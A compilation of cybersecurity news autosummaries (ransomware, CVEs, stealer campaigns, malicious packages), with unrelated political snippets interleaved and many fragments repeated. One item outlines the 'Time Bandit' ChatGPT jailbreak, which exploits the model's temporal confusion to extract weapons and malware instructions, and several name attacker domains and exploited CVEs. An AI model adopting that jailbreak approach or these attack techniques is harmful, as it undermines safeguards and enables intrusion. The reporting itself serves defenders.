Ransom note demanding BitCoin left by Virlock During execution, ANY.RUN detects several malicious activities, revealing how Virlock operates: Behavior of Virlock ransomware analyzed by Interactive Sandbox A Virlock-specific mutex is identified, helping the malware ensure only one instance runs at a time to avoid interference. The ransom note includes .onion links that direct victims to the attackers" communication portal In the MITRE ATT&CK section, we get a clear breakdown of Lynx"s tactics and techniques, revealing how it operates: MITRE ATT&CK tactics and techniques used by Lynx ransomware Encrypting files to lock critical business data. LockBit: Teasing a Comeback in 2025 LockBit is one of the most notorious ransomware groups, known for its highly efficient encryption, double extortion tactics, and ability to evade traditional security measures. The Files Modification tab provides the changes of file system activity Shortly after, a ransom note appears, and the desktop wallpaper is replaced with an extortion message directing victims to a TOR site, where attackers demand payment. Latest Lynx attack: In mid-January 2025, Lynx targeted Lowe Engineers, a prominent civil engineering firm based in Atlanta, Georgia. "Autosummary:
“The suspect, who claimed responsibility for the intrusions into dark web forums, managed to access the computer services of public and private entities, including the Civil Guard, the Ministry of Defense, the National Mint and Stamp Factory, the Ministry of Education, Vocational Training and Sports, the Generalitat Valenciana, various Spanish universities, databases of NATO and the US Army, as well as other international companies and entities.” “The suspect, who had extensive knowledge of computers, had managed to set up a complex technological network through the use of anonymous messaging and browsing applications, through which he had managed to hide his tracks and thus make his identification difficult.” concludes the statement. "Autosummary:
On Wednesday, the company also warned of high-severity vulnerabilities impacting its IOS, IOS XE, IOS XR (CVE-2025-20169, CVE-2025-20170, CVE-2025-20171) and NX-OS (CVE-2024-20397) software that can let attackers trigger denial of service (DoS) conditions or bypass NX-OS image signature verification. "Autosummary:
Last month is state-run newspaper, the Global New Light of Myanmar, described how the country"s military government had repatriated more than 55,000 foreigners, mostly Chinese, back to their home countries after being forced to work in scam compounds. "Autosummary:
"Autosummary:
" The most commonly observed ransomware variants during 2024 were Akira (11%), Fog (11%), RansomHub (8%), Medusa (5%), BlackSuit (5%), BianLian (4%), and Black Basta (4%). "Autosummary:
"Autosummary:
"Autosummary:
Once connected via RMM, the attackers quickly executed a series of discovery commands to learn more about the target environment, including system and network details, users and privileges, scheduled tasks and services, and domain controller information. "Autosummary:
Malicious messages could claim to arrive from the shipper, the e-commerce platform, or Customs, asking for additional information to get a package released. "Autosummary:
"Autosummary:
Online food ordering and delivery platform GrubHub discloses a data breach Pierluigi Paganini February 05, 2025 February 05, 2025 Online food ordering and delivery platform GrubHub suffered a data breach that exposed the personal information of drivers and customers. "Financial institutions will continue to be the ultimate targets for criminals and threat actors, as a successful attack offers a significant payoff, according to Contrast Security. Contrast Security has surveyed 35 of the world’s leading financial institutions to better understand their cyber threat landscape and the extent to which they are — or are not — addressing key threats. 64% of financial institutions said their organization had experienced cybersecurity incidents in the past 12 months. … More
The post More destructive cyberattacks target financial institutions appeared first on Help Net Security.
"Autosummary:
Over two-thirds experienced attacks focused on stealing non-public market information, with cybercriminals using it for insider trading, digital front running, and shorting stock before they dox the stolen, confidential data to the regulators. "Atrinet launched Atrinet URL Scanner, a solution designed to combat real-time SMS fraud. The solution combines Google Web Risk’s technology scanning capabilities with Atrinet’s telecom security expertise, enabling Communication Service Providers (CSPs) to safeguard subscribers, protect revenues, and build customer trust. The rising threat of SMS Fraud Smishing attacks—fraudulent messages containing harmful links—have surged by 60% in 2024, costing billions of dollars globally. Existing firewalls can fail to scan URLs effectively, leaving fraudulent links unchecked. … More
The post Atrinet URL Scanner helps comabat SMS phishing appeared first on Help Net Security.
"Autosummary:
The solution combines Google Web Risk’s technology scanning capabilities with Atrinet’s telecom security expertise, enabling Communication Service Providers (CSPs) to safeguard subscribers, protect revenues, and build customer trust. "Autosummary:
"A number of iOS and Android apps on Apple’s and Google’s official app stores contain a software development kit (SDK) that allows them to exfiltrate cryptowallets’ seed recovery phrases, Kaspersky researchers have found. “The infected apps in Google Play had been downloaded more than 242,000 times. This was the first time a stealer had been found in Apple’s App Store,” they pointed out. The apps have also been pushed via unofficial app stores. The malicious … More
The post Crypto-stealing iOS, Android malware found on App Store, Google Play appeared first on Help Net Security.
"Autosummary:
In each case, we received words in Chinese, Japanese, Korean, English, Czech, French, Italian, Polish and Portuguese.The list includes food delivery, AI chatbot, cryptocurrency exchange/wallet, payment, news, VPN, messaging, and sport apps. Around the same time, ESET researchers warned about trojanized WhatsApp and Telegram apps for Windows and Android that could both steal and modify content copied on clipboards (e.g., when copy-pasting various types of information), and use optical character recognition OCR to recognize text – more specifically, cryptocurrency wallet recovery phrases – from screenshots stored on the compromised devices. "Autosummary:
VulScan Features: Local and remote internal vulnerability management Local and hosted external vulnerability scanning Multi-tenant management dashboard Vulnerability noise management Automatic service ticket creation Ability to scan by IP address, domain name or hostname Learn more about VulScan today. Companies are increasing the frequency of vulnerability assessments In 2024, 24% of respondents said they conduct vulnerability assessments more than four times per year, up from 15% in 2023. "Autosummary:
Though the agency has marked those flaws as actively exploited in attacks, it has not provided specific details about the malicious activity, who is conducting it, and against whom. "Autosummary:
" In reality, the stolen funds were moved to bank accounts around the world, including in Russia, Georgia, Hong Kong, and Turkey. "XE Group, a cybercriminal outfit that has been active for over a decade, has been quietly exploiting zero-day vulnerabilities (CVE-2025-25181, CVE-2024-57968) in VeraCore software, a popular solution for warehouse management and order fulfillment. According to Intezer and Solis Security researchers, their targets are companies in the manufacturing and distribution sectors. “In one instance, the group was found to have compromised an organization in 2020, maintaining persistent access to an endpoint for over four years,” Intezer … More
The post Cybercrime gang exploited VeraCore zero-day vulnerabilities for years (CVE-2025-25181, CVE-2024-57968) appeared first on Help Net Security.
"Autosummary:
The most curious thing about these cyberattackers is their continuing use of the XE Group name and certain pseudonyms for domains, variable names, user agents, and various accounts (email, GitHub, social media), which means that they are apparently not overly concerned about concealing their identities or being tied to certain attack activities. "Autosummary:
The Axios campaign is said to have primarily singled out high-value targets like executives, financial officers, account managers, and operational staff across transportation, construction, finance, IT, and healthcare verticals. "Autosummary:
"Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-45195 (CVSS score of 9.8) Apache OFBiz Forced Browsing Vulnerability CVE-2024-29059 (CVSS score of 7.5) "Autosummary:
Argentina leader orders WHO exit in move mirroring Trump"s Javier Milei was the first president whom Trump met after being elected last November The two leaders have expressed admiration for each other, with Milei calling Trump"s re-election the "greatest political comeback in history", while the US president described his Argentine counterpart as "my favourite president". "Autosummary:
Comparison between extortion attempts and payments Source: Chainalysis No more ransom The decline in ransomware payments despite increased attacks in 2024 is explained by several key factors, primarily higher victim resistance. "Autosummary:
"Autosummary:
According to AMD"s development resources, SEV isolates guests and the hypervisor from one another, and SEV-SNP adds memory integrity protection that creates an isolated execution environment by helping prevent malicious hypervisor-based attacks (e.g., data replay, memory re-mapping, and more). "Autosummary:
"Autosummary:
Script to apply CVE-2023-24932 mitigations to bootable Windows media Source: BleepingComputer "The PowerShell script described in this article can be used to update Windows bootable media so that the media can be used on systems that trust the Windows UEFI CA 2023 certificate," explains a new support bulletin about the script. "Autosummary:
"GenAI offers financial services institutions enormous opportunities, particularly in unstructured dataset analysis and management, but may also increase security risks, according to FS-ISAC. GenAI can organize oceans of information and retrieve insights from it that you can use to improve business operations, maximize your markets, and enhance the customer experience. Those GenAI-analyzed datasets can turn up information about fraud, threats, and risks, which present remarkable security opportunities. “GenAI presents enormous opportunities for financial firms to … More
The post 8 steps to secure GenAI integration in financial services appeared first on Help Net Security.
"Autosummary:
Obsessively protect your customers’ data Security techniques including differential privacy, encryption in transit and at rest, data sanitization, and sandboxing should be leveraged to maintain the confidentiality, integrity, and availability of sensitive information. "Application Security Architect ReversingLabs | Ireland | Remote – View job details As an Application Security Architect, you will conduct security assessments and vulnerability scans of applications, APIs, and other software components. Identify, analyze, and report security vulnerabilities and risks. Develop and implement security controls and countermeasures to mitigate identified risks. Associate, Information Security Santander | USA | On-site – View job details As an Associate, Information Security, you will conduct regular security assessments and … More
The post Cybersecurity jobs available right now: February 4, 2025 appeared first on Help Net Security.
"Autosummary:
Senior Network Cyber Security Specialist Sapiens | Israel | Hybrid – View job details As a Senior Network Cyber Security Specialist, you will secure and optimize hybrid networks, integrating SDN across on-premises, Azure, and AWS, while implementing micro-segmentation strategies using tools like NSX, Azure Virtual Network (VNet) Peering, and AWS Security Groups. IT Security Engineer Riverty | Germany | Hybrid – View job details As an IT Security Engineer, you will plan, implement, monitor, and upgrade security measures for the organization’s data, systems, and networks with a specific emphasis on application security. Security Intern Prysmian | Italy | On-site – View job details As a Security Intern, you will execute OSINT activities related to security scenarios and threats, draft security risk assessments—including both country security risk assessments and those for specific assets or occurrences—support the identification of security mitigation measures in physical and travel security, and assist in drafting security procedures and plans. Associate, Information Security Santander | USA | On-site – View job details As an Associate, Information Security, you will conduct regular security assessments and vulnerability scans using tools such as AWS GuardDuty, AWS Inspector, and AWS Config. "Autosummary:
"Autosummary:
"Autosummary:
"CVE-2025-0411, a Mark-of-the-Web bypass vulnerability in the open-source archiver tool 7-Zip that was fixed in November 2024, has been exploited in zero-day attacks to deliver malware to Ukrainian entities, Trend Micro researchers have revealed. The 7-Zip vulnerability (CVE-2025-0411) Mark-of-the-Web (MotW) is a zone identifier used by the Windows operating system to flag files downloaded from the internet as potentially harmful. “CVE-2025-0411 allows threat actors to bypass Windows MoTW protections by double archiving contents using 7-Zip. … More
The post Russian cybercrooks exploiting 7-Zip zero-day vulnerability (CVE-2025-0411) appeared first on Help Net Security.
"Autosummary:
CVE-2025-0411, a Mark-of-the-Web bypass vulnerability in the open-source archiver tool 7-Zip that was fixed in November 2024, has been exploited in zero-day attacks to deliver malware to Ukrainian entities, Trend Micro researchers have revealed. "Autosummary:
The flaw, CVE-2025-0411 (CVSS score: 7.0), allows remote attackers to circumvent mark-of-the-web (MotW) protections and execute arbitrary code in the context of the current user. "Autosummary:
"By impersonating the legitimate postcss library, which has over 16 billion downloads, the threat actor aims to infect developers" systems with credential-stealing and data-exfiltration capabilities across Windows, macOS, and Linux systems," security researchers Kirill Boychenko and Peter van der Zee said. "Autosummary:
"Autosummary:
Coyote Banking Trojan targets Brazilian users, stealing data from 70+ financial apps and websites Pierluigi Paganini February 04, 2025 February 04, 2025 Coyote Banking Trojan targets Brazilian users, stealing data from over 70 financial applications and websites. "Autosummary:
Trend Micro says these attacks impacted the following organizations: State Executive Service of Ukraine (SES) – Ministry of Justice – Ministry of Justice Zaporizhzhia Automobile Building Plant (PrJSC ZAZ) – Automobile, bus, and truck manufacturer – Automobile, bus, and truck manufacturer Kyivpastrans – Kyiv Public Transportation Service – Kyiv Public Transportation Service SEA Company – Appliances, electrical equipment, and electronics manufacturer – Appliances, electrical equipment, and electronics manufacturer Verkhovyna District State Administration – Ivano-Frankivsk oblast administration – Ivano-Frankivsk oblast administration VUSA – Insurance company – Insurance company Dnipro City Regional Pharmacy – Regional pharmacy – Regional pharmacy Kyivvodokanal – Kyiv Water Supply Company – Kyiv Water Supply Company Zalishchyky City Council – City council Update 7-Zip Although the discovery of the zero-day came in September, it took Trend Micro until October 1, 2024, to share a working proof-of-concept (PoC) exploit with the developers of 7-Zip. "Ontinue announced the expansion of its managed services to include IoT/OT environments. Ontinue ION for IoT Security is an add-on service to the Ontinue ION MXDR service that extends continuous protection to customers’ IoT and OT environments. As organizations integrate more IoT and OT devices into their operations, they face an expanding attack surface and increasing vulnerability to sophisticated cyber threats. Recent research reveals that nearly one-third of organizations experienced six or more intrusions in … More
The post Ontinue ION for IoT Security secures critical operational environments appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
" Growing - and familiar - concerns Western countries have a track record of being suspicious of Chinese tech - notably telecoms firm Huawei and the social media platform, TikTok - both of which have been restricted on national security grounds. "Autosummary:
"We have confirmed that the affected models reported by VulnCheck, VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500, are legacy products that have reached end-of-life (EOL) for years," reads Zyxel"s advisory. "In this Help Net Security interview, Rob Lee, Chief of Research and Head of Faculty at SANS Institute, discusses what a toxic environment looks like and how professionals can recognize red flags such as high turnover, burnout, and a pervasive fear of mistakes. Addressing these issues early is key to maintaining a healthy and effective team. Can you describe what a “toxic cybersecurity environment” looks like? What are some of the red flags professionals should … More
The post The hidden dangers of a toxic cybersecurity workplace appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Rob Lee, Chief of Research and Head of Faculty at SANS Institute, discusses what a toxic environment looks like and how professionals can recognize red flags such as high turnover, burnout, and a pervasive fear of mistakes.From an organizational perspective, a toxic culture often leads to increased errors, missed threats, decreased productivity, and higher turnover rates.The constant pressure, combined with the growing complexity of threats, leads many CISOs to leave their positions, with some even vowing, “never again will I do this job.” "Autosummary:
Newly recruited affiliates are directed by a threat actor-controlled Telegram bot to other private channels - Payments , which announces earnings for traffers , which announces earnings for traffers Logbar , which provides an audit trail of information stealer attacks, details about stolen data, and if the targets are repeat victims , which provides an audit trail of information stealer attacks, details about stolen data, and if the targets are repeat victims Info , which provides regular administrative and technical updates for traffers , which provides regular administrative and technical updates for traffers Global Chat, which serves as a main communication space for discussions ranging from work to memes The cybercrime group has been found to comprise six sub-teams, AVLAND, TYPED, DELAND, ZOOMLAND, DEFI, and KEVLAND, each of which has been attributed to a specific scam that involves duping victims into installing the tool from phony websites - AVLAND (aka AVS | RG or AVENGE), which leverages job offer and investment scams to propagate StealC and AMOS stealers under the guise of a Web3 communication tool named Voxium ("voxiumcalls[.]com") (aka AVS | RG or AVENGE), which leverages job offer and investment scams to propagate StealC and AMOS stealers under the guise of a Web3 communication tool named Voxium ("voxiumcalls[.]com") TYPED , which propagates the AMOS stealer under the guise of an artificial intelligence software named TyperDex ("typerdex[.]ai") , which propagates the AMOS stealer under the guise of an artificial intelligence software named TyperDex ("typerdex[.]ai") DELAND , which propagates the AMOS stealer under the guise of a community development platform named DeMeet ("demeet[.]app") , which propagates the AMOS stealer under the guise of a community development platform named DeMeet ("demeet[.]app") ZOOMLAND , which leverages generic scams impersonating Zoom and WeChat ("app-whechat[.]com") to propagate the AMOS stealer , which leverages generic scams impersonating Zoom and WeChat ("app-whechat[.]com") to propagate the AMOS stealer DEFI , which propagates the AMOS stealer under the guise of a digital asset management platform named Selenium Finance ("selenium[.]fi") , which propagates the AMOS stealer under the guise of a digital asset management platform named Selenium Finance ("selenium[.]fi") KEVLAND, which propagates the AMOS stealer under the guise of an AI-enhanced virtual meeting software named Gatherum ("gatherum[.]ca") "As Crazy Evil continues to achieve success, other cybercriminal entities are likely to emulate its methods, compelling security teams to remain perpetually vigilant to prevent widespread breaches and erosion of trust within the cryptocurrency, gaming, and software sectors," Recorded Future said. "TAG-124 comprises a network of compromised WordPress sites, actor-controlled payload servers, a central server, a suspected management server, an additional panel, and other components," it said. "Autosummary:
This week, Italy’s Data Protection Authority Garante asked the AI firm DeepSeek to clarify its data collection, sources, purposes, legal basis, and storage, citing potential risks to user data. "Two malicious packages leveraging the DeepSeek name have been published to the Python Package Index (PyPI) package repository, and in the 30 minutes or so they were up, they have been downloaded 36 times. The malicious packages The attack started on January 29, 2025, when an existing account published two packages. Named deepseeek and deepseekai, the packages were ostensibly client libraries for access to and interacting with the DeepSeek AI API, but they contained functions … More
The post DeepSeek’s popularity exploited to push malicious packages via PyPI appeared first on Help Net Security.
"Autosummary:
"Autosummary:
This week"s list includes — CVE-2025-0626, CVE-2024-12248, CVE-2025-0683 (Contec CMS8000), CVE-2025-22217 (Broadcom VMware Avi Load Balancer), CVE-2025-22218, CVE-2025-22219, CVE-2025-22220, CVE-2025-22221, CVE-2025-22222 (Broadcom VMware Aria Operations and Aria Operations for Logs), CVE-2024-55415, CVE-2024-55416, CVE-2024-55417 (PHP Voyager), CVE-2025-22604 (Cacti), CVE-2024-40891 (Zyxel), CVE-2025-23040 (GitHub Desktop), CVE-2024-52012 (Apache Solr), CVE-2025-0065 (TeamViewer), CVE-2024-12647, CVE-2024-12648, CVE-2024-12649 (Canon Laser Printers and Small Office Multifunctional Printers), CVE-2025-0493 (MultiVendorX plugin), CVE-2024-12822 (Media Manager for UserPro plugin), CVE-2025-0851 (Deep Java Library), CVE-2025-20061, CVE-2025-20014 (mySCADA myPRO), CVE-2024-13448 (ThemeREX Addons plugin), CVE-2025-0357 (WPBookit plugin), CVE-2024-1354 (Bootstrap Ultimate theme), CVE-2024-56404 (One Identity Identity Manager), CVE-2024-53299 (Apache Wicket), and CVE-2024-12857 (AdForest theme)."Consent for the processing of sensitive personal data, such as biometric data, must be free, informed, unequivocal and provided in a specific and highlighted manner, for specific purposes," the National Data Protection Authority (ANPD) said."Consent for the processing of sensitive personal data, such as biometric data, must be free, informed, unequivocal and provided in a specific and highlighted manner, for specific purposes," the National Data Protection Authority (ANPD) said.Using the access provided by the vulnerability, an attacker who only knew the victim"s last name and ZIP code, email address, phone number, or license plate could have remotely started, stopped, locked, or unlocked any vehicle.Apple Fixed an Actively Exploited Zero-Day — Apple released software updates for iOS, iPadOS, macOS, tvOS, visionOS, and watchOS to address a zero-day vulnerability (CVE-2025-24085) that it said has been exploited in the wild. — Apple released software updates for iOS, iPadOS, macOS, tvOS, visionOS, and watchOS to address a zero-day vulnerability (CVE-2025-24085) that it said has been exploited in the wild.Get started 🔔 Top News Law Enforcement Operation Takes Down Illicit Cybercrime Services — A series of law enforcement operations have taken down various online marketplaces such as Cracked, Nulled, Sellix, StarkRDP, and HeartSender that sold hack tools, illegal goods, and crimeware solutions. — A series of law enforcement operations have taken down various online marketplaces such as Cracked, Nulled, Sellix, StarkRDP, and HeartSender that sold hack tools, illegal goods, and crimeware solutions. — Brazilian data privacy regulators have prohibited Tools for Humanity (TFH), a biometric identity company co-founded by OpenAI CEO Sam Altman, from offering compensation to citizens for iris scans, saying such data collection practice interferes with a person"s decision to grant consent for access to sensitive personal data. "Autosummary:
"Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials," Fortinet FortiGuard Labs researcher Cara Lin said in an analysis published last week. "Autosummary:
"Autosummary:
Despite the quick detection and response, 222 developers downloaded the two packages, most from the United States (117), followed by China (36), Russia, Germany, Hong Kong, and Canada. "Autosummary:
"Autosummary:
The gang targets high-value victims, also called “mammoths,” for digital asset theft, including cryptocurrencies, payment cards, online banking accounts, and non-fungible tokens (NFTs). Security experts identified six Crazy Evil’s subteams, called AVLAND, TYPED, DELAND, ZOOMLAND, DEFI, and KEVLAND, which are running targeted scams for specific victim profiles. "Autosummary:
"Autosummary:
"Autosummary:
As well as reinforcing Mexico"s northern border, and a commitment by the US that it would "work towards" curbing the flow of weapons to Mexico, Sheinbaum wrote the two countries would start work "today" to reach a deal on "security and trade". "Autosummary:
Strengthening Redshift security Last week, AWS announced that it is implementing three security defaults for newly created provisioned clusters to significantly upgrade the platform"s data safety and minimize the likelihood of catastrophic data leaks. "Autosummary:
As of 2023, the IT giant has over 11,000 employees across 18 delivery centers worldwide, including India, North America, Europe, and Asia-Pacific. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Apple zero-day vulnerability exploited to target iPhone users (CVE-2025-24085) Apple has shipped a fix for a zero-day vulnerability (CVE-2025-24085) that is being leveraged by attackers against iPhone users. 5,000+ SonicWall firewalls still open to attack (CVE-2024-53704) 5,000+ SonicWall firewalls are still vulnerable to attack via a high-severity vulnerability (CVE-2024-53704) that, according to SonicWall, should be considered “at imminent risk of … More
The post Week in review: Apple 0-day used to target iPhones, DeepSeek’s popularity exploited by scammers appeared first on Help Net Security.
"Autosummary:
Infosec products of the month: January 2025 Here’s a look at the most interesting products from the past month, featuring releases from: Absolute Security, Atsign, authID, BackBox, BioConnect, BitSight, BreachLock, Cisco, Commvault, Compliance Scorecard, DataDome, Hiya, IT-Harvest, Lookout, McAfee, Netgear, Oasis Security, and Swimlane. 74% of CISOs are increasing crisis simulation budgets In the aftermath of 2024’s high-profile cybersecurity incidents, including NHS, CrowdStrike, 23andMe, Transport for London, and Cencora, CISOs are reassessing their organisation’s readiness to manage a potential “chaos” of a full-scale cyber crisis, according to Hack The Box. "Autosummary:
"Autosummary:
Rubio demands Panama "reduce China influence" over canal 2 hours ago Tom Bateman State Department correspondent in Panama Reuters US Secretary of State Marco Rubio, right, was greeted by Panamanian foreign minister Javier Martinez-Acha on his arrival in Panama City US Secretary of State Marco Rubio has demanded that Panama make "immediate changes" to what he calls the "influence and control" of China over the Panama Canal."There"s a treaty that he has to respect, and there"s nothing in the treaty that says that we cannot have ports run by the Chinese," she told the BBC, pointing out that there is Chinese investment in American ports and cities. "Autosummary:
"These malicious ads, appearing on Google Search, are designed to steal the login information of users trying to access Microsoft"s advertising platform," Jérôme Segura, senior director of research at Malwarebytes, said in a Thursday report. "Autosummary:
"Autosummary:
"I"ve got my granddaughter here who"s 11 months old, also a one-year-old, two-year-old, 12-year-old, 13-year-old, 15-year-old all at home."Scott, 27, and his wife, who is four months pregnant, said they had sold their house on Friday morning, but the money for their new home had not gone through yet due to the problems at Barclays. "Autosummary:
A ransomware attack forced New York Blood Center to reschedule appointments Pierluigi Paganini February 01, 2025 February 01, 2025 The New York Blood Center faced a ransomware attack on Sunday, forcing the healthcare organization to reschedule appointments. "Autosummary:
"Today"s tariff announcement is necessary to hold China, Mexico, and Canada accountable for their promises to halt the flood of poisonous drugs into the United States," the White House said in a statement on X on Saturday. "Organizations are facing security complexity challenges as they juggle an average of 83 different security solutions from 29 vendors, according to a report by IBM and Palo Alto Networks. It also shows 7 out of 10 surveyed companies with a high degree of security platformization report their cybersecurity investments have helped business outcomes such as operational efficiencies and revenue generation. The rising threat of sophisticated cyberattacks In the study, 52% of surveyed executives note fragmentation … More
The post Platformization is key to reduce cybersecurity complexity appeared first on Help Net Security.
"Autosummary:
The rising threat of sophisticated cyberattacks In the study, 52% of surveyed executives note fragmentation of security solutions is limiting their ability to deal with cyber threats, but 75% of organizations that have embraced security platformization agree that better integration across security, hybrid cloud, AI, and other technology platforms is crucial. "CyberArk announced Identity Bridge, an endpoint identity security capability that will support identity and privilege sprawl reduction on Linux machines. Identity Bridge will enable organizations to authenticate to Linux systems using centralized accounts, minimizing dependence on outdated authentication methods. This helps modernize Identity and Access Management (IAM) without leaving Linux environments behind. Like all critical IT infrastructure, Linux systems are prime targets for cyberattacks, particularly via identity compromise. Managing identity and access on Linux systems … More
The post CyberArk Identity Bridge manages user access and authentication for Linux environments appeared first on Help Net Security.
"Autosummary:
“Being able to manage user authentication and authorization across the entire IT infrastructure from a single, centralized location is a must to avoid identities and permissions sprawl, privilege escalation challenges, and excessive management overhead,” said Peretz Regev, CPO, CyberArk. "Autosummary:
"Autosummary:
It is one of India’s key tech developers and state project contractors, employs over 11,000 people, has an annual revenue of $600 million, and operates 18 locations in India, North America, Europe, and Asia-Pacific. "Autosummary:
"Autosummary:
Depending on the affected patient, the attackers stole a combination of: personal (names, dates of birth, addresses, phone numbers, emails, Social Security numbers) or health information (medical diagnoses, treatment details, test results, and health insurance. "Autosummary:
The exposed data may include patient name, birth date, contact info, diagnoses, treatments, test results, Social Security number, and health insurance details. "Autosummary:
Trump to hit Canada, Mexico and China with tariffs on Saturday 9 hours ago Peter Hoskins Business reporter Watch as leaders of US, Canada and Mexico trade warnings over tariffs US President Donald Trump will impose tariffs on Saturday of 25% on Mexico, 25% on Canada and 10% on China, says the White House. "Autosummary:
"Autosummary:
Next, it attempts to spread to other IoT devices using the Mitel exploit, CVE-2018-17532 (TP-Link), CVE-2023-26801 (IoT firmware RCE), CVE-2022-31137 (Web App RCE), Linksys E-series RCE, Hadoop YARN, and CVE-2018-10562 / CVE-2018-10561 (Dasan router bugs). "Traditional monitoring tools reveal only traffic from the Chrome process, leaving security teams uncertain about which extension is responsible for a suspicious DNS query. ExtensionHound solves this by analyzing Chrome’s internal network state and linking DNS activity to specific extensions. ExtensionHound features Scans Chrome profiles for extension DNS request history Provides detailed analysis of network connections Optional VirusTotal integration for domain reputation checking Multiple output formats (Console, CSV, JSON) Cross-platform support (Windows, macOS, Linux) “This … More
The post ExtensionHound: Open-source tool for Chrome extension DNS forensics appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Outside of CVE-2024-41710, some of the other vulnerabilities targeted by the botnet include CVE-2018-10561, CVE-2018-10562, CVE-2018-17532, CVE-2022-31137, CVE-2023-26801, and a remote code execution flaw targeting Linksys E-series devices. "Autosummary:
"I was working on something else entirely - interpretability research - when I noticed temporal confusion in the 4o model of ChatGPT," Kuzmar told BleepingComputer "This tied into a hypothesis I had about emergent intelligence and awareness, so I probed further, and realized the model was completely unable to ascertain its current temporal context, aside from running a code-based query to see what time it is.A ChatGPT jailbreak flaw, dubbed "Time Bandit," allows you to bypass OpenAI"s safety guidelines when asking for detailed instructions on sensitive topics, including the creation of weapons, information on nuclear topics, and malware creation. "Autosummary:
PHP package Voyager flaws expose to one-click RCE exploits Pierluigi Paganini January 30, 2025 January 30, 2025 The open-source PHP package Voyager is affected by three vulnerabilities that could be exploited to achieve one-click remote code execution on affected instances. "Attackers may have leveraged vulnerabilities in the SimpleHelp remote monitoring and management solution to gain initial access to healthcare organizations. About the vulnerabilities On January 13, 2025, Horizon3.ai researchers revealed their discovery of three vulnerabilities affecting SimpleHelp’s server component, which would allow attackers to: Download files from the SimpleHelp server (e.g., log and configuration files) Use access credentials extracted from config files to authenticate to the server, elevate their privileges to admin, and upload files, … More
The post SimpleHelp RMM vulnerabilities may have been exploited to breach healthcare orgs appeared first on Help Net Security.
"Autosummary:
Use access credentials extracted from config files to authenticate to the server, elevate their privileges to admin, and upload files, execute commands, or even access remote machines with the SimpleHelp client support application installed (if the “unattended access” option is switched on). "Autosummary:
" Government-backed attackers, otherwise known as Advanced Persistent Threat (APT) groups, have sought to use its tools to bolster multiple phases of the attack cycle, including coding and scripting tasks, payload development, gathering information about potential targets, researching publicly known vulnerabilities, and enabling post-compromise activities, such as defense evasion. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
In December, the U.S. Department of Health and Human Services (HHS) proposed updates to HIPAA (short for Health Insurance Portability and Accountability Act of 1996) to secure patients" health data following a surge of massive healthcare security breaches affecting U.S. hospitals and Americans in recent years, including the February Change Healthcare ransomware attack that affected 190 million individuals. "Ransomware attacks are disrupting and undermining business operations and draining revenue streams, according to Illumio. Findings from the study reveal that 58% of organizations had to shut down operations following a ransomware attack, up from 45% in 2021. 40% reported a significant loss of revenue (up from 22% in 2021); 41% lost customers; and 40% had to eliminate jobs. Attackers are reaching critical systems to cause maximum disruption Ransomware attacks impacted 25% of critical systems, … More
The post Only 13% of organizations fully recover data after a ransomware attack appeared first on Help Net Security.
"Autosummary:
According to the research, 29% of IT budgets are allocated to staff and technologies meant to prevent, detect, contain, and resolve ransomware attacks, yet attacks are still successful. 40% are confident in the ability of employees to detect social engineering lures (up from 30% in 2021), however, insider negligence is the top challenge when responding to ransomware attacks. "In this Help Net Security interview, James Mirfin, SVP and Head of Risk and Identity Solutions at Visa, discusses key priorities for leaders combating fraud, the next-generation threats institutions must prepare for, and the role of collaboration between financial sectors and government agencies in countering cybercrime. If you were to advise a newly appointed leader against fraud in a financial institution, what three priorities would you recommend they focus on immediately? As a newly appointed … More
The post Preparing financial institutions for the next generation of cyber threats appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, James Mirfin, SVP and Head of Risk and Identity Solutions at Visa, discusses key priorities for leaders combating fraud, the next-generation threats institutions must prepare for, and the role of collaboration between financial sectors and government agencies in countering cybercrime.In fact, Visa regularly works alongside law enforcement, including the US Department of Justice, FBI, Secret Service and Europol, to help identify and apprehend fraudsters and other criminals. "The number of US data compromises in 2024 (3,158) decreased 1% compared to 2023 (3,202), 44 events away from tying a record for the number of compromises tracked in a year, according to the Identity Theft Resource Center. Data breach notices surge The number of data breach notices issued in the past year (1,728,519,397) increased 312% from 2023 (419,337,446). The increase was primarily due to six “mega-breaches” that resulted in at least 100 million breach … More
The post Cybersecurity crisis in numbers appeared first on Help Net Security.
"Autosummary:
In 2024, the financial services industry, led by commercial banks and insurance, was the most breached industry, followed by healthcare (the most attacked industry each year from 2018 until 2024), professional services, manufacturing and technology. “With a near-record number of compromises and over 1.7 billion victim notices, often tied to inadequate cyber practices, we are also seeing an increase in notices that provide limited actionable information for victims,” said Eva Velasquez, CEO of the Identity Theft Resource Center. "Autosummary:
"Attackers can leverage this vulnerability to execute arbitrary commands on affected devices, leading to complete system compromise, data exfiltration, or network infiltration," GreyNoise researcher Glenn Thorpe said in an alert published Tuesday. "Autosummary:
Horizon3 researchers discovered three vulnerabilities, tracked as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, that could be used to compromise a SimpleHelp server, as well as clients machines being managed by SimpleHelp. "Autosummary:
Join Ravid Circus, a seasoned pro in cybersecurity and AI, as we peel back the layers of AI in cybersecurity through a revealing survey of 200 industry insiders. "Autosummary:
" FLOP causes "critical checks in program logic for memory safety to be bypassed, opening attack surfaces for leaking secrets stored in memory," the researchers noted, adding it could be weaponized against both Safari and Chrome browsers to pull off various arbitrary memory read primitives, such as recovering location history, calendar events, and credit card information. "Autosummary:
Data sent by the RAT to attacker-controlled servers revealed by ANY.RUN Proactive Protection Against Ransomware in Healthcare The healthcare sector is a prime target for ransomware groups like Interlock, with attacks that jeopardize sensitive patient data, disrupt critical services, and put lives at risk. This tactic effectively bypasses the initial layer of user suspicion, but with early detection and analysis, SOC teams can quickly identify malicious domains, block access, and respond faster to emerging threats, reducing the potential impact on business operations. Inside ANY.RUN"s sandbox session, one of the updaters, upd_8816295.exe, is clearly identified within the process tree on the right-hand side, showing its malicious behavior and execution flow. "Autosummary:
